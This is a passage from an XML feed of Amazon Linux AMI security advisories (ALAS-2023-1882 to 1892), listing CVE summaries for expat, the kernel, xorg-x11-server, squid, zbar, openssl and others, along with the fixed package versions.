</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="20.10.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.13-3.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.13-3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1882</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1882: medium priority package update for expat</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23990:
Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23990" title="" id="CVE-2022-23990" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="15.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.34.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.34.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.34.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.34.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.34.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="15.34.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.34.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.34.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1883</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1883: important priority package update for kernel</title><issued date="2023-11-10 17:32:00" /><updated date="2024-04-11 01:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5717:
A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.
If perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.
We recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.
CVE-2023-42754:
A NULL pointer dereference flaw was found in the Linux kernel ipv4 stack. The socket buffer (skb) was assumed to be associated with a device before calling __ip_options_compile, which is not always the case if the skb is re-routed by ipvs. This issue may allow a local user with CAP_NET_ADMIN privileges to crash the system.
CVE-2023-34324:
A flaw in the kernel Xen event handler can cause a deadlock with Xen console handling in unprivileged Xen guests.
CVE-2023-3397:
A race condition between two functions, lmLogClose() and txEnd(), in the Linux kernel's JFS filesystem can lead to a use-after-free vulnerability and crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3397" title="" id="CVE-2023-3397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34324" title="" id="CVE-2023-34324" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42754" title="" id="CVE-2023-42754" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5717" title="" id="CVE-2023-5717" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.328-174.540.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1884</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1884: important priority package update for xorg-x11-server</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5380:
A use-after-free flaw was found in the xorg-x11-server. An X server crash may occur in a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode) if the pointer is warped from within a window on one screen to the root window of the other screen and if the original window is destroyed followed by another window being destroyed.
CVE-2023-5367:
A out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5367" title="" id="CVE-2023-5367" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5380" title="" id="CVE-2023-5380" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.52.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.52.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1885</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1885: important priority package update for squid</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46728:
Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a NULL pointer dereference bug Squid is vulnerable to a Denial of Service attack against Squid's Gopher gateway. The gopher protocol is always available and enabled in Squid prior to Squid 6.0.1. Responses triggering this bug are possible to be received from any gopher server, even those without malicious intent. Gopher support has been removed in Squid version 6.0.1. Users are advised to upgrade. Users unable to upgrade should reject all gopher URL requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46728" title="" id="CVE-2023-46728" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.51.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.51.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.51.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.51.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.51.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.51.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.51.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.51.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.51.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.51.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.51.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1886</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1886: important priority package update for squid</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46724:
Squid is a caching proxy for the Web. Due to an Improper Validation of Specified Index bug, Squid versions 3.3.0.1 through 5.9 and 6.0 prior to 6.4 compiled using `--with-openssl` are vulnerable to a Denial of Service attack against SSL Certificate validation. This problem allows a remote server to perform Denial of Service against Squid Proxy by initiating a TLS Handshake with a specially crafted SSL Certificate in a server certificate chain. This attack is limited to HTTPS and SSL-Bump. This bug is fixed in Squid version 6.4. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. Those who you use a prepackaged version of Squid should refer to the package vendor for availability information on updated packages.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46724" title="" id="CVE-2023-46724" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="17.52.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.52.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.52.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.52.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.52.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.52.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.52.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.52.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.52.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.52.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.52.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1887</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1887: medium priority package update for zbar</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40890:
A stack-based buffer overflow vulnerability exists in the lookup_sequence function of ZBar 0.23.90. Specially crafted QR codes may lead to information disclosure and/or arbitrary code execution. To trigger this vulnerability, an attacker can digitally input the malicious QR code, or prepare it to be physically scanned by the vulnerable scanner.
CVE-2023-40889:
A heap-based buffer overflow exists in the qr_reader_match_centers function of ZBar 0.23.90. Specially crafted QR codes may lead to information disclosure and/or arbitrary code execution. To trigger this vulnerability, an attacker can digitally input the malicious QR code, or prepare it to be physically scanned by the vulnerable scanner.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40889" title="" id="CVE-2023-40889" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40890" title="" id="CVE-2023-40890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="zbar" version="0.10" release="19.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/zbar-0.10-19.3.amzn1.x86_64.rpm</filename></package><package name="zbar-debuginfo" version="0.10" release="19.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/zbar-debuginfo-0.10-19.3.amzn1.x86_64.rpm</filename></package><package name="zbar-devel" version="0.10" release="19.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/zbar-devel-0.10-19.3.amzn1.x86_64.rpm</filename></package><package name="zbar-devel" version="0.10" release="19.3.amzn1" epoch="0" arch="i686"><filename>Packages/zbar-devel-0.10-19.3.amzn1.i686.rpm</filename></package><package name="zbar-debuginfo" version="0.10" release="19.3.amzn1" epoch="0" arch="i686"><filename>Packages/zbar-debuginfo-0.10-19.3.amzn1.i686.rpm</filename></package><package name="zbar" version="0.10" release="19.3.amzn1" epoch="0" arch="i686"><filename>Packages/zbar-0.10-19.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1888</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1888: low priority package update for containerd</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd" version="1.4.13" release="6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-6.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-6.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.13" release="6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1889</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1889: medium priority package update for amazon-efs-utils</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46174:
efs-utils is a set of Utilities for Amazon Elastic File System (EFS). A potential race condition issue exists within the Amazon EFS mount helper in efs-utils versions v1.34.3 and below. When using TLS to mount file systems, the mount helper allocates a local port for stunnel to receive NFS connections prior to applying the TLS tunnel. In affected versions, concurrent mount operations can allocate the same local port, leading to either failed mount operations or an inappropriate mapping from an EFS customer's local mount points to that customer's EFS file systems. This issue is patched in version v1.34.4. There is no recommended work around. We recommend affected users update the installed version of efs-utils to v1.34.4 or later.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46174" title="" id="CVE-2022-46174" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-efs-utils" version="1.35.0" release="1.amzn1" epoch="0" arch="noarch"><filename>Packages/amazon-efs-utils-1.35.0-1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1890</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1890: important priority package update for microcode_ctl</title><issued date="2023-11-10 20:56:00" /><updated date="2023-11-15 23:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-23583:
An issue was found in redundant REX instruction prefix values affecting third generation Intel Xeon Scalable (?Icelake?) processors. The issue may allow a local third-party actor using such instructions to cause a denial of service (DOS) or achieve privilege escalation. CVE-2023-23583 only affects Amazon Linux customers on EC2 metal platforms. Please refer to the AWS Security Bulletin for more information on the affected instance families and the impacts on AWS services: (https://aws.amazon.com/security/security-bulletins/AWS-2023-013). (CVE-2023-23583)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23583" title="" id="CVE-2023-23583" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl" version="2.1" release="47.42.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.42.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.42.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.42.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.42.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.42.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.42.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1891</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1891: medium priority package update for openssl</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5678:
Issue summary: Generating excessively long X9.42 DH keys or checking
excessively long X9.42 DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_generate_key() to
generate an X9.42 DH key may experience long delays. Likewise, applications
that use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check()
to check an X9.42 DH key or X9.42 DH parameters may experience long delays.
Where the key or parameters that are being checked have been obtained from
an untrusted source this may lead to a Denial of Service.
While DH_check() performs all the necessary checks (as of CVE-2023-3817),
DH_check_pub_key() doesn't make any of these checks, and is therefore
vulnerable for excessively large P and Q parameters.
Likewise, while DH_generate_key() performs a check for an excessively large
P, it doesn't check for an excessively large Q.
An application that calls DH_generate_key() or DH_check_pub_key() and
supplies a key or parameters obtained from an untrusted source could be
vulnerable to a Denial of Service attack.
DH_generate_key() and DH_check_pub_key() are also called by a number of
other OpenSSL functions. An application calling any of those other
functions may similarly be affected. The other functions affected by this
are DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate().
Also vulnerable are the OpenSSL pkey command line application when using the
"-pubcheck" option, as well as the OpenSSL genpkey command line application.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5678" title="" id="CVE-2023-5678" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.165.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1892</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1892: important priority package update for xorg-x11-server</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5574:
A use-after-free flaw was found in xorg-x11-server-Xvfb. This issue occurs in Xvfb with a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode). If the pointer is warped from a screen 1 to a screen 0, a use-after-free issue may be triggered during shutdown or reset of the Xvfb server, allowing for possible escalation of privileges or denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5574" title="" id="CVE-2023-5574" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.53.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.53.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" 